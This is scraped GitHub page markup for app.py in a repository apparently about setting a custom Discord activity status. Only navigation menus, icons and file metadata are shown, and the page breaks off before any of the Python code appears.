010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path> </svg> <span data-content="Code">Code</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="issues-tab" href="/agambajwa/discord-custom-activity/issues" data-tab-item="i1issues-tab" data-selected-links="repo_issues repo_labels repo_milestones /agambajwa/discord-custom-activity/issues" data-hotkey="g i" data-ga-click="Repository, Navigation click, Issues tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path> </svg> <span data-content="Issues">Issues</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="pull-requests-tab" href="/agambajwa/discord-custom-activity/pulls" data-tab-item="i2pull-requests-tab" data-selected-links="repo_pulls checks /agambajwa/discord-custom-activity/pulls" data-hotkey="g p" data-ga-click="Repository, Navigation click, Pull requests tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path 
fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path> </svg> <span data-content="Pull requests">Pull requests</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="actions-tab" href="/agambajwa/discord-custom-activity/actions" data-tab-item="i3actions-tab" data-selected-links="repo_actions /agambajwa/discord-custom-activity/actions" data-hotkey="g a" data-ga-click="Repository, Navigation click, Actions tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path> </svg> <span data-content="Actions">Actions</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="projects-tab" href="/agambajwa/discord-custom-activity/projects" data-tab-item="i4projects-tab" data-selected-links="repo_projects new_repo_project repo_project /agambajwa/discord-custom-activity/projects" data-hotkey="g b" data-ga-click="Repository, Navigation click, Projects tab" data-view-component="true" 
class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <span data-content="Projects">Projects</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="wiki-tab" href="/agambajwa/discord-custom-activity/wiki" data-tab-item="i5wiki-tab" data-selected-links="repo_wiki /agambajwa/discord-custom-activity/wiki" data-hotkey="g w" data-ga-click="Repository, Navigation click, Wikis tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path> </svg> <span 
data-content="Wiki">Wiki</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="security-tab" href="/agambajwa/discord-custom-activity/security" data-tab-item="i6security-tab" data-selected-links="security overview alerts policy token_scanning code_scanning /agambajwa/discord-custom-activity/security" data-hotkey="g s" data-ga-click="Repository, Navigation click, Security tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path> </svg> <span data-content="Security">Security</span> <include-fragment src="/agambajwa/discord-custom-activity/security/overall-count" accept="text/fragment+html"></include-fragment> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="insights-tab" href="/agambajwa/discord-custom-activity/pulse" data-tab-item="i7insights-tab" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /agambajwa/discord-custom-activity/pulse" data-ga-click="Repository, 
Navigation click, Insights tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path> </svg> <span data-content="Insights">Insights</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> </ul> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> <span class="sr-only">More</span> </div> </summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> <ul> <li data-menu-item="i0code-tab" hidden> <a role="menuitem" class="js-selected-navigation-item selected dropdown-item" aria-current="page" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments /agambajwa/discord-custom-activity" href="/agambajwa/discord-custom-activity"> Code </a> </li> <li 
data-menu-item="i1issues-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_issues repo_labels repo_milestones /agambajwa/discord-custom-activity/issues" href="/agambajwa/discord-custom-activity/issues"> Issues </a> </li> <li data-menu-item="i2pull-requests-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_pulls checks /agambajwa/discord-custom-activity/pulls" href="/agambajwa/discord-custom-activity/pulls"> Pull requests </a> </li> <li data-menu-item="i3actions-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_actions /agambajwa/discord-custom-activity/actions" href="/agambajwa/discord-custom-activity/actions"> Actions </a> </li> <li data-menu-item="i4projects-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_projects new_repo_project repo_project /agambajwa/discord-custom-activity/projects" href="/agambajwa/discord-custom-activity/projects"> Projects </a> </li> <li data-menu-item="i5wiki-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_wiki /agambajwa/discord-custom-activity/wiki" href="/agambajwa/discord-custom-activity/wiki"> Wiki </a> </li> <li data-menu-item="i6security-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="security overview alerts policy token_scanning code_scanning /agambajwa/discord-custom-activity/security" href="/agambajwa/discord-custom-activity/security"> Security </a> </li> <li data-menu-item="i7insights-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /agambajwa/discord-custom-activity/pulse" href="/agambajwa/discord-custom-activity/pulse"> Insights </a> </li> 
</ul> </details-menu></div> </details></div> </nav> </div> <div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " > <a href="https://github.dev/" class="d-none js-github-dev-shortcut" data-hotkey=".,E,c o d e">Open in github.dev</a> <div> <a class="d-none js-permalink-shortcut" data-hotkey="y" href="/agambajwa/discord-custom-activity/blob/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py">Permalink</a> <!-- blob contrib key: blob_contributors:v22:13522820112eb6c6400625101636e4def06f02593a899cf92e79c023ce6ed737 --> <div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path> </svg> <span class="css-truncate-target" data-menu-button>master</span> <span class="dropdown-caret"></span> </summary> <div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span class="SelectMenu-title">Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" 
d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg></button> </header> <input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div> <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div> <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/agambajwa/discord-custom-activity/refs" cache-key="v0:1601025696.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhbWJhandhL2Rpc2NvcmQtY3VzdG9tLWFjdGl2aXR5" prefetch-on-mouseover > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div> </template> <!-- TODO: this max-height is necessary or else the branch list won't scroll. why? 
--> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax=" <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </div> </div> <template data-target="ref-selector.itemTemplate"> <a href="https://github.com/agambajwa/discord-custom-activity/blob/{{ urlEncodedRefName }}/app.py" class="SelectMenu-item" role="menuitemradio" rel="nofollow" aria-checked="{{ isCurrent }}" data-index="{{ index }}"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-1 css-truncate css-truncate-overflow {{ isFilteringClass }}">{{ refName }}</span> <span hidden="{{ isNotDefault }}" class="Label Label--secondary flex-self-start">default</span> </a> </template> <footer class="SelectMenu-footer"><a href="/agambajwa/discord-custom-activity/branches">View all branches</a></footer> </ref-selector> </div> <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector tab-selected:ref-selector focus-list:ref-selector " data-targets="input-demux.sinks" query-endpoint="/agambajwa/discord-custom-activity/refs" 
cache-key="v0:1601025696.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhbWJhandhL2Rpc2NvcmQtY3VzdG9tLWFjdGl2aXR5" > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template> <template data-target="ref-selector.itemTemplate"> <a href="https://github.com/agambajwa/discord-custom-activity/blob/{{ urlEncodedRefName }}/app.py" class="SelectMenu-item" role="menuitemradio" rel="nofollow" aria-checked="{{ isCurrent }}" data-index="{{ index }}"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-1 css-truncate css-truncate-overflow {{ isFilteringClass }}">{{ refName }}</span> <span hidden="{{ isNotDefault }}" class="Label Label--secondary flex-self-start">default</span> </a> </template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax=" <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </div> </div> <footer class="SelectMenu-footer"><a 
href="/agambajwa/discord-custom-activity/tags">View all tags</a></footer> </ref-selector> </div> </tab-container> </input-demux> </div> </div> </details> </div> <h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span class="js-repo-root text-bold"><span class="js-path-segment d-inline-block wb-break-all"><a data-pjax=" <span class="separator">/</span><details class="details-reset details-overlay d-inline" id="jumpto-symbol-select-menu"> <summary aria-haspopup="true" data-hotkey="r" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.click_on_blob_definitions&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;click_on_blob_definitions&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="8ab7943d9e2ebd68838936d01c014cb5492553c6b3f67f3ecef74fb8344b8b58" role="button" data-view-component="true" class="Link--secondary css-truncate btn-link"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path> </svg> <span data-menu-button>Jump to</span> <span class="dropdown-caret"></span> </summary> <details-menu class="SelectMenu SelectMenu--hasFilter" role="menu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span class="SelectMenu-title">Code definitions</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="jumpto-symbol-select-menu"> <svg 
aria-label="Close menu" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> </header> <div class="SelectMenu-filter"> <input class="SelectMenu-input form-control js-filterable-field" id="jumpto-symbols-filter-field" type="text" autocomplete="off" spellcheck="false" autofocus placeholder="Filter definitions" aria-label="Filter definitions"> </div> <div class="SelectMenu-list"> <div data-filterable-for="jumpto-symbols-filter-field" data-filterable-type="substring"> <a class="SelectMenu-item d-flex flex-justify-between css-truncate" role="menuitemradio" aria-checked="false" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.navigate_to_blob_definition&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;navigate_to_blob_definition&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0cf0b78350c5c2e7878d0e0e8a2344d9d2ea181f5103bfbac5345d842937be4d" href="/agambajwa/discord-custom-activity/blob/master/app.py <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-auto css-truncate-target" data-menu-button-text>main</span> <span class="flex-auto d-flex flex-justify-end">Function</span> </a> <a 
class="SelectMenu-item d-flex flex-justify-between css-truncate" role="menuitemradio" aria-checked="false" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.navigate_to_blob_definition&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;navigate_to_blob_definition&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0cf0b78350c5c2e7878d0e0e8a2344d9d2ea181f5103bfbac5345d842937be4d" href="/agambajwa/discord-custom-activity/blob/master/app.py <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-auto css-truncate-target" data-menu-button-text>set_activity</span> <span class="flex-auto d-flex flex-justify-end">Function</span> </a> </div> </div> <footer class="SelectMenu-footer"> <div class="d-flex flex-justify-between"> Code navigation index up-to-date <svg class="octicon octicon-dot-fill text-green" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M8 4a4 4 0 100 8 4 4 0 000-8z"></path></svg> </div> </footer> </div> </details-menu> </details> </h2> <a href="/agambajwa/discord-custom-activity/find/master" class="js-pjax-capture-input btn mr-2 d-none d-md-block" data-pjax data-hotkey="t"> Go to file </a> <details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 
0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <div data-view-component="true"> <ul class="dropdown-menu dropdown-menu-sw"> <li class="d-block d-md-none"> <a class="dropdown-item d-flex flex-items-baseline" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;FIND_FILE_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="c1741d2af11cddb7e7412f38207326d10be1eee4009dab1c2fcfffcfe5bfe980" data-ga-click="Repository, find file, location:repo overview" data-hotkey="t" data-pjax="true" href="/agambajwa/discord-custom-activity/find/master"> <span class="flex-auto">Go to file</span> <span class="text-small color-text-secondary" aria-hidden="true">T</span> </a> </li> <li data-toggle-for="blob-more-options-details"> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Go to line</span> <span class="text-small color-text-secondary" aria-hidden="true">L</span> </span> </button> </li> <li data-toggle-for="blob-more-options-details"> <button data-toggle-for="jumpto-symbol-select-menu" type="button" data-view-component="true" class="dropdown-item btn-link"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Go to definition</span> <span class="text-small color-text-secondary" aria-hidden="true">R</span> </span> </button> </li> <li class="dropdown-divider" role="none"></li> <li> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="app.py" data-view-component="true" 
class="dropdown-item cursor-pointer"> Copy path </clipboard-copy> </li> <li> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/agambajwa/discord-custom-activity/blob/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py" data-view-component="true" class="dropdown-item cursor-pointer"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Copy permalink</span> </span> </clipboard-copy> </li> </ul> </div> </details> </div> <div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/agambajwa/discord-custom-activity/contributors/master/app.py" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2">&nbsp;</div> </div> <div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1">&nbsp;</div> <span class="color-text-danger h6 loader-error">Cannot retrieve contributors at this time</span> </div> </include-fragment> </div> <div data-target="readme-toc.content" class="Box mt-3 position-relative "> <div class="Box-header py-2 pr-2 d-flex flex-shrink-0 flex-md-row flex-items-center" > <div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1"> 46 lines (38 sloc) <span class="file-info-divider"></span> 1015 Bytes </div> <div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <a href="/agambajwa/discord-custom-activity/raw/master/app.py" id="raw-url" role="button" data-view-component="true" class="btn-sm btn BtnGroup-item"> Raw </a> <a href="/agambajwa/discord-custom-activity/blame/master/app.py" data-hotkey="b" role="button" data-view-component="true" class="js-update-url-with-hash btn-sm btn BtnGroup-item"> Blame </a> </div> <div> <a class="btn-octicon tooltipped 
